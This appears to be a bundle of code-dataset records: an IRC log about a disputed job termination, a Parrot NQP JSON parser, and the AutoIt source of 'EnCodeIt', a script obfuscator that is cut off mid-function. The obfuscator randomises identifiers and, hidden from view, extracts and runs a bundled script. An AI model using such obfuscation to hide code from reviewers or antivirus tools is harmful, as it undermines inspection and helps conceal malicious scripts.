2016-03-02 11:02:56 Michael I still have no documentation relating to the termination... Something even as basic as The Employment separation certficate I don't have... I still don't have any formal letter advising of my termination... and finally... and i mean finally I got paid out my entitlements for which I assume is for my termination
2016-03-02 11:03:50 Michael but hey... because I don't have any documents I don't even know what the payment is for exactly... You know as per my calculations they actually stuffed up by about 1 or 2 days pay
2016-03-02 11:04:29 Michael I got less then what I calculated by exactly a day to which I assume they probably didn't calculate the last day I attended for half the day which was the 16th of Feb...
2016-03-02 11:05:07 Michael but hey if this was all proper and legitmate to begin with I'd already have a document stating this information :/
2016-03-02 11:05:24 Michael So my dilemma is:
2016-03-02 11:06:41 fsociety yuuusss
2016-03-02 11:09:18 Michael Thursday the HR rep sent me an email saying that she's attempted to contact me regarding my email and that should I wish to discuss the matter further to call her on the work phone / office line.
2016-03-02 11:09:41 Michael so basically I can state what I mentioned to you but on a much mroe professional level
2016-03-02 11:09:44 Michael ALTHOUGH
2016-03-02 11:10:00 Michael what troubles me is the fact she's wanting me to cal her :S
2016-03-02 11:10:33 Michael I don't understand why she wants me to call her... I really think for serious matters like this there should be some formal documentation especially now
2016-03-02 11:10:56 Michael heck I didn't have any to begin with and now there trying to keep anything from being on record??
2016-03-02 11:11:34 Michael So yeah IF i call legal service to obtain some info... I'll see if i should reply via email stating what I want to state again or if infact I should call her back
2016-03-02 11:11:47 Michael and as she said... to 'discuss' the matter further
2016-03-02 11:12:13 Michael whats there to discuss... is one of the first things that's running through my mind
2016-03-02 11:12:41 Michael secondly why hasn't she followed anything up that I requested such as my separation certificate, termination letter? entitlement letter?
2016-03-02 11:13:10 Michael surely she could have replied in a an email and then concluded by saying if I wish to discuss the matter further to call her...
2016-03-02 11:13:44 Michael not to say nothing, reply with nothing, and to call her to discuss my issues further?? like wtf
2016-03-02 11:15:44 fsociety just threaten legal action in your emails.. that will usually push them along quickly
2016-03-02 11:15:47 fsociety thats what i usually do :)
2016-03-02 11:16:29 Michael well the main thing I'm quite certain I got the last payment which had my annual leave and one week's payment in lieu
2016-03-02 11:17:09 Michael so threatening them I would actually have to threaten them with going to the fair work comission
2016-03-02 11:18:50 Michael I guess looking at it deeper now... There's really two sides to this story.... two sides from my point of view I mean :P hehe
2016-03-02 11:18:53 Michael basically...
2016-03-02 11:20:52 Michael I need to engage with this HR rep to obtain official documents for my termination. This way I can then apply for centrelink as I have the required forms to do so etc
2016-03-02 11:21:25 fsociety just have to be forceful at this point otherwise those corps will just put you on the backburner
2016-03-02 11:22:11 Michael But while I'm obtaining the documents I need to also somehow make mention that this whole termination has been unlawful as it was enacted under an unjust reason
2016-03-02 11:22:33 Michael argh I need to call legal service
2016-03-02 11:22:35 Michael I'll do that
2016-03-02 11:22:37 Michael bbs
2016-03-02 13:55:22 - irc: disconnected from server
2016-03-02 17:56:52 - irc: disconnected from server
2016-03-04 23:15:51 fsociety you online sir
2016-03-04 23:15:51 - [Michael] is away: Mobile
2016-03-06 12:25:19 - irc: disconnected from server
| IRC log | 0 | 0x4b1dN/2016-dots | misc/weechat/logs/irc.bitlbee.michael.weechatlog | [
"MIT"
] |
#! parrot-nqp
# Copyright (C) 2011, Parrot Foundation.
# This is the start to rewrite JSON. It starts with rewriting data_json only.
# data_json depends on the PGE. The rewrite use NQP.
=begin Pod
=for NAME
JSON, a lightweight data-interchange format.
=head1 SYNOPSIS
The C<from_json> method return a PMC that containing the data structure
for a given valid JSON (JavaScript Object Notation) string.
For example:
=begin code
.sub 'main' :main
.local pmc result
load_language 'JSON'
result = from_json( '[1,2,3]' )
load_bytecode 'dumper.pbc'
_dumper( result, 'JSON' )
.end
=end code
For more information about the structure of the JSON representation, see
the documentation at L<http://www.json.org/>.
=end Pod
INIT {
pir::load_bytecode('P6Regex.pbc');
}
grammar JSON::Grammar is HLL::Grammar {
rule TOP { <value> }
proto token value { <...> }
token value:sym<string> { <string> }
token value:sym<number> {
'-'?
[ <[1..9]> <[0..9]>+ | <[0..9]> ]
[ '.' <[0..9]>+ ]?
[ <[Ee]> <[+\-]>? <[0..9]>+ ]?
# <.worry('oh, a number!')>
}
rule value:sym<array> {
'[' [ <value> ** ',' ]? ']'
}
rule value:sym<object> {
'{'
[ [ <string> ':' <value> ] ** ',' ]?
'}'
}
rule value:sym<true> {
'true'
}
rule value:sym<false> {
'false'
}
rule value:sym<null> {
'null'
}
token string {
<?["]> <quote_EXPR: ':qq'>
}
}
class JSON::Actions is HLL::Actions {
method TOP($/) {
make PAST::Block.new($<value>.ast, :node($/));
};
method value:sym<string>($/) { make $<string>.ast; }
method value:sym<number>($/) { make +$/; }
method value:sym<array>($/) {
my $past := PAST::Op.new(:pasttype<list>, :node($/));
if $<value> {
for $<value> { $past.push($_.ast); }
}
make $past;
}
method value:sym<object>($/) {
my $past := PAST::Stmts.new( :node($/) );
my $hashname := PAST::Compiler.unique('hash');
my $hash := PAST::Var.new( :scope<register>, :name($hashname),
:viviself('Hash'), :isdecl );
my $hashreg := PAST::Var.new( :scope<register>, :name($hashname) );
$past.'push'($hash);
# loop through all string/value pairs, add set opcodes for each pair.
my $n := 0;
while $n < +$<string> {
$past.'push'(PAST::Op.new( :pirop<set__vQ~*>, $hashreg,
$<string>[$n].ast, $<value>[$n].ast ) );
$n++;
}
# return the Hash as the result of this node
$past.'push'($hashreg);
make $past;
}
method value:sym<true>($/) { make 1; }
method value:sym<false>($/) { make 0; }
method string($/) { make $<quote_EXPR>.ast; }
}
class JSON::Compiler is HLL::Compiler {
INIT {
JSON::Compiler.language('JSON');
JSON::Compiler.parsegrammar(JSON::Grammar);
JSON::Compiler.parseactions(JSON::Actions);
}
}
sub from_json($value) {
my $result := JSON::Compiler.eval($value, :actions(JSON::Actions.new));
return $result;
}
# vim: expandtab shiftwidth=4 ft=perl6:
| Perl6 | 5 | winnit-myself/Wifie | compilers/data_json/JSON.nqp | [
"Artistic-2.0"
] |
#NoTrayIcon
ProcessSetPriority(@AutoItPID, 0)
Global $gVarCmdline_1, $gVarRetLoadSkinCrafter
If $cmdline[0] Then
If $cmdline[0] <= 1 Then $gVarCmdline_1 = $cmdline[1]
EndIf
Global Const $gVar0167 = 7
Global Const $gVarRndFlag = 1
Global Const $gVarRndMaxA = 9
Global Const $gVar016A = 2
Global $gUseOfEnCodeItNotPermitted = Fn0081("You are not permitted to use EnCodeIt")
Global $gDataUserInfo = Fn0081("You have been verified and authorized to use EnCodeIt")
Global Const $gVarRndMinB = 8
Global Const $gVarRndD1 = 5
Global Const $gVarRndMinA = 3
Global Const $gVar0170 = 6
Global Const $gVarRndC = 4
Global Const $gVarRndC2 = 0
Global Const $AutoItPID = @AutoItPID
Global Const $ScriptDir = @ScriptDir
Global Const $AppDataDir = @AppDataDir
Global Const $DocumentsCommonDir = @DocumentsCommonDir
Global Const $ScriptFullPath = @ScriptFullPath
Global Const $UserName = @UserName
Global Const $HomeDrive = @HomeDrive
Global Const $UserProfileDir = @UserProfileDir
Global Const $CRLF = @CRLF
Global Const $CR = @CR
Global Const $lf = @LF
Global Const $gVarRetDummy1 = InitFiles()
Global Const $gVarRetDummy2 = FnFilesCleanUp()
;Global Const $gVarRetDummy3 = FnInetCheckBlackList1()
Global $EnCodeItInfo_Dat
HotKeySet('{ESC}', 'Unload_EnCodeIt')
Opt("GUIOnEventMode", 1)
Opt("GUIResizeMode", 802)
Opt("WinTitleMatchMode", 4)
Func LoadSkinCrafter($SkinEngineDll, $SkinDll)
Local $hDll = DllOpen($SkinEngineDll)
DllCall($hDll, "none","AboutSkinCrafter")
CloseWnd()
DllCall($hDll, "int", "InitLicenKeys", "int", MakeUniCodeStr("0"), "int", MakeUniCodeStr("SKINCRAFTER"), "int", MakeUniCodeStr("SKINCRAFTER.COM"), "int", MakeUniCodeStr("support@skincrafter.com"), "int", MakeUniCodeStr("DEMOSKINCRAFTERLICENCE"))
CloseWnd()
DllCall($hDll, "int", "DefineLanguage", "int", 0)
CloseWnd()
DllCall($hDll, "int", "InitDecoration", "int", 1)
CloseWnd()
DllCall($hDll, "int", "LoadSkinFromFile", "int", MakeUniCodeStr($SkinDll))
CloseWnd()
DllCall($hDll, "int", "ApplySkin")
CloseWnd()
Return $hDll
EndFunc
Func MakeUniCodeStr($Arg00)
Local $StrLen = StringLen($Arg00)
Local $Var0002 = DllCall("oleaut32.dll", "int", "SysAllocStringLen", "int", 0, "int", $StrLen)
DllCall("kernel32.dll", "int", "MultiByteToWideChar", "int", 0, "int", 0, "str", $Arg00, "int", $StrLen, "ptr", $Var0002[0], "int", $StrLen)
Return $Var0002[0]
EndFunc
Func CloseWnd($WndClassName = 'classname=#32770')
$MatchMode = Opt("WinTitleMatchMode", 4)
Local $hWnd = WinGetHandle($WndClassName)
ControlHide($hWnd, '', '')
WinKill($hWnd)
Opt("WinTitleMatchMode", $MatchMode)
EndFunc
Func UnLoadSkinCrafter()
DllCall($gVarRetLoadSkinCrafter, "int", "DeInitDecoration")
DllCall($gVarRetLoadSkinCrafter, "int", "RemoveSkin")
DllClose($gVarRetLoadSkinCrafter)
EndFunc
Global $gDivKey2 = Random($gVarRndMinA & $gVarRndMinB, $gVarRndMinB & $gVarRndMaxA, $gVarRndFlag), $gObfuFileData
Global $gVar0184 = Random($gVarRndC & $gVarRndC2, $gVarRndD1 & $gVarRndC2, 1), $gSleepTimeMs, $gOutPFileName, $gVar0187
Global $gEncodeStartStop, $gOutpFileNDrive, $gOutpFileNPath, $gOutpFileNName, $gOutpFileNExt, $gSleepTime = IniRead($ScriptDir & "\EnCodeIt.ini", "SleepTime", "Sleep", 10)
Global $gRndCharPrefix = Chr(Random(65, 90, 1)), $g4ByteRandHex = Fn4ByteRandHex()
Global $gLogFile_EnCodeIt = ";~===========================================================================================" & $CRLF & ";~ EnCodeIt" & $CRLF & ";~ By" & $CRLF & ";~ SmOke_N" & $CRLF & ";~===========================================================================================" & $CRLF
Global $gLogFile_Functions = $CRLF & ";~===========================================================================================" & $CRLF & ";~ Functions" & $CRLF & ";~ " & FnGetMonthName(@MON) & " " & @MDAY & ", " & @YEAR & $CRLF & ";~ " & FnGetTime() & $CRLF & ";~===========================================================================================" & $CRLF & "; No. | Function | EnCoded Function" & $CRLF & ";~===========================================================================================" & $CRLF & $CRLF
Global $gLogFile_Vars = $CRLF & ";~===========================================================================================" & $CRLF & ";~ Variables" & $CRLF & ";~ " & FnGetMonthName(@MON) & " " & @MDAY & ", " & @YEAR & $CRLF & ";~ " & FnGetTime() & $CRLF & ";~===========================================================================================" & $CRLF & "; No. | Variables | EnCoded Variables" & $CRLF & ";~===========================================================================================" & $CRLF & $CRLF
$GUIhWnd = GUICreate("EnCodeIt v2.0 By SmOke_N", 355, 150)
$gVar0187 = $GUIhWnd
$GUIhMenu = GUICtrlCreateMenu("&File")
$MenuItem_Open = GUICtrlCreateMenuitem("O&pen", $GUIhMenu, 1)
GUICtrlCreateMenuitem('', $GUIhMenu, 2)
$MenuItem_Exit = GUICtrlCreateMenuitem("&Exit", $GUIhMenu, 3)
$MenuItem_Options = GUICtrlCreateMenu("&Options")
$MenuItem_Compiler_Location = GUICtrlCreateMenu("Compiler Location", $MenuItem_Options, 1)
GUICtrlCreateMenuitem('', $MenuItem_Options, 2)
$M8D5A722A6C5B4FC9 = GUICtrlCreateMenuitem(IniRead($ScriptDir & "\EnCodeIt.ini", "Compiler", "Aut2Exe", ''), $MenuItem_Compiler_Location)
GUICtrlCreateMenuitem('', $MenuItem_Compiler_Location, 2)
$MenuItem_Change = GUICtrlCreateMenuitem("Change", $MenuItem_Compiler_Location, 3)
$MenuItem_DecompilerLocation = GUICtrlCreateMenu("Decompiler Location", $MenuItem_Options, 3)
$M8D5A722F6C5A4F79 = GUICtrlCreateMenuitem(IniRead($ScriptDir & "\EnCodeIt.ini", "Decompiler", "Exe2Aut", ''), $MenuItem_DecompilerLocation)
GUICtrlCreateMenuitem('', $MenuItem_DecompilerLocation, 2)
$M8D5A7223685B4F29 = GUICtrlCreateMenuitem("Change", $MenuItem_DecompilerLocation, 3)
GUICtrlCreateMenuitem('', $MenuItem_Options, 4)
$M8D5A72296C504F29 = GUICtrlCreateMenu("PC Relief", $MenuItem_Options, 5)
$M8D5A728F4C5B4F29 = GUICtrlCreateMenuitem("Current Sleep Average Is: " & $gSleepTime & " Milliseconds", $M8D5A72296C504F29, 1)
GUICtrlCreateMenuitem('', $M8D5A72296C504F29, 2)
$M8D5A722F6C5B5F29 = GUICtrlCreateMenuitem("Change", $M8D5A72296C504F29, 3)
$M8D5A72266C5B4A29 = GUICtrlCreateLabel("Input the complete path for the file to Encode...", 10, 15, 300, 20, 0x0001)
$GUI_Txt_Input = GUICtrlCreateInput('', 10, 35, 300, 20)
If $cmdline[0] Then GUICtrlSetData($GUI_Txt_Input, $gVarCmdline_1)
$GUILabelStatus = GUICtrlCreateLabel('', 20, 90, 150, 20)
$lblEncoding = GUICtrlCreateLabel('', 160, 90, 80, 20)
$GUILabelProcentComplett = GUICtrlCreateLabel('', 290, 90, 50, 20, 0x0001)
$M8D5A792FFC5B4F29 = GUICtrlCreateButton("www", 310, 35, 30, 20)
GUICtrlSetFont($M8D5A792FFC5B4F29, 10, 400, -1, "Wingdings")
$GUIButton_StartEncoding = GUICtrlCreateButton("Start Encoding", 130, 60, 80, 30)
$GUIProgressBar = GUICtrlCreateProgress(20, 110, 310, 15)
ControlHide($GUIhWnd, '', $GUIProgressBar)
GUISetOnEvent(-3, 'FnQuit_EnCodeIt', $GUIhWnd)
GUICtrlSetOnEvent($MenuItem_Open, 'FnWndHandler')
GUICtrlSetOnEvent($MenuItem_Exit, 'FnWndHandler')
GUICtrlSetOnEvent($MenuItem_Change, 'FnWndHandler')
GUICtrlSetOnEvent($M8D5A7223685B4F29, 'FnWndHandler')
GUICtrlSetOnEvent($M8D5A792FFC5B4F29, 'FnWndHandler')
GUICtrlSetOnEvent($GUIButton_StartEncoding, 'FnWndHandler')
GUICtrlSetOnEvent($M8D5A722F6C5B5F29, 'FnWndHandler')
FnWndShowHide($GUIhWnd)
GUISetState()
CloseWnd()
Fn0078()
If UBound($cmdline) - 1 > 1 Then
FileInstall('C:\Documents and Settings\EnCodeItInfo\Restart_EnCoded1.au3', $ScriptDir & "\EnCodeItInfo\Backup.bak", 1)
If $gSleepTime > 0 And $gSleepTime < 11 Then
$gSleepTimeMs = $gSleepTime * 100
ElseIf $gSleepTime = 0 Or $gSleepTime = '' Then
$gSleepTimeMs = 10000
Else
$gSleepTimeMs = 1000
EndIf
Local $Var0004, $Var0005 = TimerInit(), $Var0006, $Var0007, $Var0008
Local $Var0009 = UBound($cmdline) - 1, $Var000A
FnWndShowHide($GUIhWnd, 1)
ControlShow($GUIhWnd, '', $GUIProgressBar)
AdlibEnable('FnShowEncodingLabel', $gSleepTimeMs)
For $Var00B1 = 1 To $Var0009
Local $Var000B, $Var000C, $Var000D, $Var000E
Local $Var000F = SplitFileName($cmdline[$Var00B1], $Var000B, $Var000C, $Var000D, $Var000E)
GUICtrlSetData($GUILabelStatus, $Var000D & $Var000E)
GUICtrlSetData($GUI_Txt_Input, '')
GUICtrlSetData($GUI_Txt_Input, $cmdline[$Var00B1])
FnCompileDecompile($cmdline[$Var00B1])
Sleep($gSleepTime)
$gObfuFileData = FnRemoveComments($ScriptDir & "\EnCodeItInfo\Compiled.au3")
Sleep($gSleepTime)
$gObfuFileData = FnRemoveLineBreaks($gObfuFileData)
Sleep($gSleepTime)
FnScanFuncNames($gObfuFileData)
Sleep($gSleepTime)
$gObfuFileData = FnAddEnCodeItFuncs($gObfuFileData, $gVar0184)
Sleep($gSleepTime)
FnGetVarName($gObfuFileData)
Sleep($gSleepTime)
$gObfuFileData = FnReplaceVarStrFuncName($gObfuFileData)
$gObfuFileData = FnJoin($gObfuFileData)
Sleep($gSleepTime)
$Var000A += UBound(StringSplit(StringStripCR($gObfuFileData), $lf)) - 1
$gOutPFileName &= FnOutpAndCleanup($cmdline[$Var00B1], $gObfuFileData) & @CR
FnSetStatus($GUIProgressBar, $GUILabelStatus, $GUILabelProcentComplett, "File " & $Var00B1 & " of " & $Var0009 & " Done", (($Var00B1 / $Var0009) * 100))
Sleep(1000)
Next
AdlibDisable()
$Var0006 = TimerDiff($Var0005) / 1000
MsgBox(64, "Info:", "You're Encoded files are here:" & $CR & $gOutPFileName & $CR & "It took EnCodeIt " & StringFormat("%i minute(s) and %i second(s)", $Var0006 / 60, Mod($Var0006, 60)) & " to obfuscate " & $Var0009 & " Files and " & $Var000A & " lines.")
Local $Var0010 = Run(FileGetShortName($ScriptFullPath) & " /AutoIt3ExecuteScript " & FileGetShortName($ScriptDir & "\EnCodeItInfo\Backup.bak") & " " & $AutoItPID & " " & FileGetShortName($DocumentsCommonDir), '', @SW_HIDE)
ProcessWait($Var0010)
FileDelete($ScriptDir & "\EnCodeItInfo\Backup.bak")
Exit
EndIf
While 1
Sleep(100000)
WEnd
Func FnWndHandler()
Switch @GUI_CtrlId
Case $MenuItem_Open, $M8D5A792FFC5B4F29
Local $Var0011 = FileOpenDialog("Choose a file to encode", @WorkingDir, "All Files (*.*)")
If Not @error Then GUICtrlSetData($GUI_Txt_Input, $Var0011)
Case $MenuItem_Exit
FnQuit_EnCodeIt()
Case $MenuItem_Change
Local $Var0012 = FileOpenDialog("Change Compiler Aut2Exe", @WorkingDir, "Exe Files (*.exe)", "Aut2Exe.exe")
If Not @error Then
IniWrite($ScriptDir & "\EnCodeIt.ini", "Compiler", "Aut2Exe", $Var0012)
GUICtrlSetData($M8D5A722A6C5B4FC9, $Var0012)
EndIf
Case $M8D5A7223685B4F29
Local $Var0013 = FileOpenDialog("Change Decompiler Aut2Exe", @WorkingDir, "Exe Files (*.exe)", "Exe2Aut.exe")
If Not @error Then
IniWrite($ScriptDir & "\EnCodeIt.ini", "Decompiler", "Exe2Aut", $Var0013)
GUICtrlSetData($M8D5A722F6C5A4F79, $Var0012)
EndIf
Case $M8D5A722F6C5B5F29
Local $Var0014 = InputBox("Change Sleep Time", " ", "<Change Sleep Here>", '', 210, 120)
If StringIsInt($Var0014) Then
IniWrite($ScriptDir & "\EnCodeIt.ini", "SleepTime", "Sleep", Int($Var0014))
$gSleepTime = Int($Var0014)
GUICtrlSetData($M8D5A728F4C5B4F29, "Current Sleep Average Is: " & Int($Var0014) & " Milliseconds")
EndIf
Case $GUIButton_StartEncoding
If UBound($cmdline) - 1 <= 1 Then
;Set SleepTime
If $gSleepTime > 0 And $gSleepTime < 11 Then
$gSleepTimeMs = $gSleepTime * 100
ElseIf $gSleepTime = 0 Or $gSleepTime = '' Then
$gSleepTimeMs = 10000
Else
$gSleepTimeMs = 1000
EndIf
;Check
$gVarCmdline_1 = GUICtrlRead($GUI_Txt_Input)
If Not FileExists($gVarCmdline_1) Then
MsgBox(16, "Error", "Please check to ensure that the file path is correct to the file you wish to encode.")
Return ''
EndIf
Local $Var0004, $TimeStamp = TimerInit(), $VarTimerDiff, $VarMsgBoxRet, $Var0008
FnWndShowHide($GUIhWnd, 1)
ControlShow($GUIhWnd, '', $GUIProgressBar)
AdlibEnable('FnShowEncodingLabel', $gSleepTimeMs)
;Comment out because ExeToAut Decompiler don't support CommandlineArguments
;~ FnCompileDecompile($gVarCmdline_1)
;~ Sleep($gSleepTime)
;~ FnSetStatus($GUIProgressBar, $GUILabelStatus, $GUILabelProcentComplett, "Step 1 of 9 Done", 5)
; $gObfuFileData = FnRemoveComments($ScriptDir & "\EnCodeItInfo\Compiled.au3")
$gObfuFileData = FnRemoveComments($gVarCmdline_1)
Sleep($gSleepTime)
FnSetStatus($GUIProgressBar, $GUILabelStatus, $GUILabelProcentComplett, "Step 2 of 9 Done", 10)
MsgBox(0,"FilteredFileData",$gObfuFileData)
$gObfuFileData = FnRemoveLineBreaks($gObfuFileData)
Sleep($gSleepTime)
FnSetStatus($GUIProgressBar, $GUILabelStatus, $GUILabelProcentComplett, "Step 3 of 9 Done", 20)
MsgBox(0,"FnRemoveLineBreaks",$gObfuFileData)
FnScanFuncNames($gObfuFileData)
Sleep($gSleepTime)
FnSetStatus($GUIProgressBar, $GUILabelStatus, $GUILabelProcentComplett, "Step 4 of 9 Done", 30)
MsgBox(0,"FnScanFuncNames",$gObfuFileData)
$gObfuFileData = FnAddEnCodeItFuncs($gObfuFileData, $gVar0184)
Sleep($gSleepTime)
FnSetStatus($GUIProgressBar, $GUILabelStatus, $GUILabelProcentComplett, "Step 5 of 9 Done", 40)
MsgBox(0,"FnAddEnCodeItFuncs " & $gVar0184,$gObfuFileData)
FnGetVarName($gObfuFileData)
Sleep($gSleepTime)
FnSetStatus($GUIProgressBar, $GUILabelStatus, $GUILabelProcentComplett, "Step 6 of 9 Done", 60)
MsgBox(0,"FnGetVarName " ,$gObfuFileData)
$gObfuFileData = FnReplaceVarStrFuncName($gObfuFileData)
FnSetStatus($GUIProgressBar, $GUILabelStatus, $GUILabelProcentComplett, "Step 7 of 9 Done", 85)
MsgBox(0,"FnReplaceVarStrFuncName " ,$gObfuFileData)
$gObfuFileData = FnJoin($gObfuFileData)
Sleep($gSleepTime)
FnSetStatus($GUIProgressBar, $GUILabelStatus, $GUILabelProcentComplett, "Step 8 of 9 Done", 90)
MsgBox(0,"FnJoin " ,$gObfuFileData)
$VarOutPLines = StringSplit(StringStripCR($gObfuFileData), $lf)
$gOutPFileName = FnOutpAndCleanup($gVarCmdline_1, $gObfuFileData)
FnSetStatus($GUIProgressBar, $GUILabelStatus, $GUILabelProcentComplett, "Finished Encoding", 100)
AdlibDisable()
$VarTimerDiff = TimerDiff($TimeStamp) / 1000
$VarMsgBoxRet = MsgBox(68, "Info:", "You're Encoded file is here:" & $CR & $gOutPFileName & $CR & $CR & "It took EnCodeIt " & StringFormat("%i minute(s) and %i second(s)", $VarTimerDiff / 60, Mod($VarTimerDiff, 60)) & " to obfuscate " & $VarOutPLines[0] & " lines." & $CR & $CR & "Would you like to open the file now?")
If $VarMsgBoxRet = 6 Then
Run(@ComSpec & " /c """ & $gOutPFileName & """", '', @SW_HIDE)
EndIf
FnWndShowHide($GUIhWnd)
ControlHide($GUIhWnd, '', $GUIProgressBar)
GUICtrlSetData($lblEncoding, '')
$gEncodeStartStop = False
FnSetStatus($GUIProgressBar, $GUILabelStatus, $GUILabelProcentComplett, '', '')
$gRndCharPrefix = Chr(Random(65, 90, 1))
EndIf
EndSwitch
EndFunc
Func FnWndShowHide($Wnd, $ArgOpt01 = 0)
Local $VarOldPos = WinGetPos($Wnd)
If Not $ArgOpt01 And IsArray($VarOldPos) Then
; X position , Y position , Width , Height
WinMove($Wnd, '', $VarOldPos[0], $VarOldPos[1], $VarOldPos[2], $VarOldPos[3] - 35)
ElseIf IsArray($VarOldPos) Then
WinMove($Wnd, '', $VarOldPos[0], $VarOldPos[1], $VarOldPos[2], $VarOldPos[3] + 35)
EndIf
EndFunc
Func FnShowEncodingLabel()
$gEncodeStartStop = Not $gEncodeStartStop
If $gEncodeStartStop Then
GUICtrlSetData($lblEncoding, "...Encoding...")
Else
GUICtrlSetData($lblEncoding, '')
EndIf
If IsArray($EnCodeItInfo_Dat) Then
For $Var00B1 = 1 To UBound($EnCodeItInfo_Dat) - 1
If $EnCodeItInfo_Dat[$Var00B1] = "PausingEnCodeItUsage" Then
MsgBox(16, "Warning!", "All usage has been temporarily suspened, this could be due to an update.", 5)
Exit
EndIf
Next
EndIf
EndFunc
Func FnSetStatus($Arg00, $Arg01, $Arg02, $Arg03, $Arg04)
GUICtrlSetData($Arg00, $Arg04 + 10)
GUICtrlSetData($Arg01, $Arg03)
If $Arg04 <> '' Then
GUICtrlSetData($Arg02, Round($Arg04, 2) & "%")
Else
GUICtrlSetData($Arg02, '')
EndIf
Return 1
EndFunc
Func FnOutpAndCleanup($Arg00, $Arg01)
Local $Var001B, $Var001C, $Var001D, $SeqNum = 1
$Var001B = SplitFileName($Arg00, $gOutpFileNDrive, $gOutpFileNPath, $gOutpFileNName, $gOutpFileNExt)
;Scan for exisiting File
While FileExists($gOutpFileNDrive & $gOutpFileNPath & $gOutpFileNName & "_EnCoded" & $SeqNum & ".au3")
$SeqNum += 1
WEnd
Local $VarNewFileName = $gOutpFileNDrive & $gOutpFileNPath & $gOutpFileNName & "_EnCoded" & $SeqNum & ".au3"
Local $VarhFile = FileOpen($VarNewFileName, 2)
Local $VarhFileLog = FileOpen($gOutpFileNDrive & $gOutpFileNPath & $gOutpFileNName & "_EnCoded" & $SeqNum & ".log", 2)
FileWrite($VarNewFileName, $Arg01)
FileWrite($VarhFileLog, $gLogFile_EnCodeIt)
FileWrite($VarhFileLog, $gLogFile_Functions)
FileWrite($VarhFileLog, $gLogFile_Vars)
FileClose($VarhFile)
FileClose($VarhFileLog)
FileDelete($ScriptDir & "\EnCodeItInfo\Compiled.au3")
FileDelete($ScriptDir & "\EnCodeItInfo\Text.ini")
FileDelete($ScriptDir & "\EnCodeItInfo\Var.ini")
FileDelete($ScriptDir & "\EnCodeItInfo\Func.ini")
FileDelete($ScriptDir & "\EnCodeItInfo\FuncReplace.ini")
Return $VarNewFileName
EndFunc
Func FnJoin($Arg00)
Local $Lines = StringSplit(StringStripCR($Arg00), $lf), $Var001D
For $i = 1 To UBound($Lines) - 1
$Var001D &= StringStripWS($Lines[$i ], 7) & $CRLF
Next
Return StringTrimRight($Var001D, StringLen($CRLF))
EndFunc
Func FnGetVarName($Arg00)
Local $VarFuncNames, $Lines, $Var0026 = $gRndCharPrefix
Local $Var0027 = StringRegExp ($Arg00, "(?i:\$)([a-zA-Z0-9/_]+)", 3)
If Not IsArray($Var0027) Then Return SetError(1, 0, 0)
For $Var00B1 = 0 To UBound($Var0027) - 1
$VarFuncNames &= $Var0027[$Var00B1] & Chr(01)
Next
$VarFuncNames = StringSplit(StringTrimRight($VarFuncNames, 1), Chr(01))
$VarFuncNames = Fn007C($VarFuncNames)
Sleep($gSleepTime)
$Lines = Fn0069($VarFuncNames)
Sleep($gSleepTime)
For $i = 1 To UBound($Lines) - 1
If $Lines[$i] = "cmdline" Or $Lines[$i] = "cmdlineraw" Then ContinueLoop
$Lines[$i] = $gRndCharPrefix & $Lines[$i]
Next
Sleep($gSleepTime)
FnVarNamesToVar_ini($VarFuncNames, $Lines)
Sleep($gSleepTime)
Return 1
EndFunc
Func Fn0069(ByRef $ArgRef00)
Local $Var0028, $Var0029, $Var002A = $g4ByteRandHex
Local $Arr002B[UBound($ArgRef00) ]
$Arr002B[0] = UBound($ArgRef00) - 1
For $Var004C = 1 To $Arr002B[0]
If $ArgRef00[$Var004C] = "cmdline" Then
$Arr002B[$Var004C] = "cmdline"
ContinueLoop
EndIf
If $ArgRef00[$Var004C] = "cmdlineraw" Then
$Arr002B[$Var004C] = "cmdlineraw"
ContinueLoop
EndIf
$Arr002B[$Var004C] = $Var002A
Do
Local $Var002C = 0
Local $Var002D = Random(2, StringLen($Var002A) - 1, 1)
$Arr002B[$Var004C] = StringLeft($Arr002B[$Var004C], $Var002D - 1) & Hex(Random(0, 15, 1), 1) & StringTrimLeft($Arr002B[$Var004C], $Var002D)
For $Var0075 = 1 To $Var004C - 1
If $Arr002B[$Var0075] = $Arr002B[$Var004C] Then
$Arr002B[$Var0075] = $Arr002B[$Var004C]
$Var002C = 1
ExitLoop
EndIf
Next
Until Not $Var002C
Sleep($gSleepTime)
Next
Return $Arr002B
EndFunc
Func FnScanFuncNames($Arg00)
Local $VarFuncNames, $Lines
Local $VarFuncNames = GetFuncNames($Arg00)
If Not IsArray($VarFuncNames) Then Return 1 ;Doesn't contain Functions
; Add internal EnCodeIt FunctionNames to $intEnCodeIt_FuncNames
Local $intEnCodeIt_FuncNames = StringSplit("_EnCodeIt_UStr,_EnCodeIt_UStr2,_EnCodeIt_OStr", ",")
For $i = 1 To UBound($intEnCodeIt_FuncNames) - 1
FnAddElementToArray($VarFuncNames, $intEnCodeIt_FuncNames[$i])
Next
$VarFuncNames = Fn007C($VarFuncNames)
Sleep($gSleepTime)
$Lines = Fn006B($VarFuncNames)
Sleep($gSleepTime)
For $i = 1 To UBound($Lines) - 1
If $Lines[$i] = 'Fn009F' Or $Lines[$i] = "OnAutoItStart" Then ContinueLoop
$Lines[$i] = "_" & $gRndCharPrefix & $Lines[$i]
Next
FnWriteFunc_ini($VarFuncNames, $Lines)
Sleep($gSleepTime)
Return 1
EndFunc
Func Fn006B(ByRef $ArgRef00)
Local $Var0028, $Var0029, $Var002A = $g4ByteRandHex
Local $Arr002B[UBound($ArgRef00) ]
$Arr002B[0] = UBound($ArgRef00) - 1
For $Var004C = 1 To $Arr002B[0]
If $ArgRef00[$Var004C] = 'Fn009F' Then
$Arr002B[$Var004C] = 'Fn009F'
ContinueLoop
EndIf
If $ArgRef00[$Var004C] = "OnAutoItStart" Then
$Arr002B[$Var004C] = "OnAutoItStart"
ContinueLoop
EndIf
$Arr002B[$Var004C] = $Var002A
Do
Local $Var002C = 0
Local $Var002D = Random(2, StringLen($Var002A) - 1, 1)
$Arr002B[$Var004C] = StringLeft($Arr002B[$Var004C], $Var002D - 1) & Hex(Random(0, 15, 1), 1) & StringTrimLeft($Arr002B[$Var004C], $Var002D)
For $Var0075 = 1 To $Var004C - 1
If $Arr002B[$Var0075] = $Arr002B[$Var004C] Then
$Var002C = 1
ExitLoop
EndIf
Next
Until Not $Var002C
Sleep($gSleepTime)
Next
Return $Arr002B
EndFunc
Func GetFuncNames($Arg00)
Local $Lines = StringSplit(StringStripCR($Arg00), @LF)
Local $ArrFuncNames[$Lines[0] + 1], $VarFuncCount, $Var003B
For $i = 1 To $Lines[0]
;Is Line a Function?
If StringLeft(StringStripWS($Lines[$i], 8), 4) = "func" Then
;Does it have '(' ?
If Not StringInStr($Lines[$i], "(") Then ContinueLoop
$VarFuncCount += 1
